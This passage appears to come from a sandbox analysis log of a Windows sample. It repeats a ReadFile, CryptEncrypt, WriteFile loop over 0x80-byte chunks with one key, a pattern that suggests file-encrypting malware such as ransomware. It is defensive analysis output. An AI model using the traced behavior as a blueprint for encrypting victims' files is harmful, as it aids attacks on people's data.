dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.160] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.160] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.160] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.160] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.160] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.160] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.160] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.160] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.160] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.160] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.160] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.160] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.160] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.160] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.160] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.160] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.160] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.160] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.160] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.161] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.161] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.161] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.161] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.161] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.161] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.161] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.161] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.161] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.161] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.161] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.161] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.161] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.161] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.161] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.161] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.161] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.161] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.161] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.161] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.161] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.161] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.161] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.161] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.161] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.161] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.162] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.162] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.162] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.162] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.162] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.162] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.162] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.162] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.162] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.162] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.162] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.162] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.162] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.162] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.162] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.162] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.162] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.162] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.162] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.162] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.162] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.162] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.162] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.162] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.162] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.162] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.163] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.163] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.163] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.163] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.163] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.163] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.163] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.163] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.163] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.163] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.163] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.163] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.163] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.163] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.163] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.163] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.163] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.163] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.163] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.163] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.163] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.163] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.163] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.163] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.163] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.163] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.164] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.164] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.164] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.164] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.164] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.164] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.164] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.164] CryptEncrypt (in: hKey=0x37bd80, 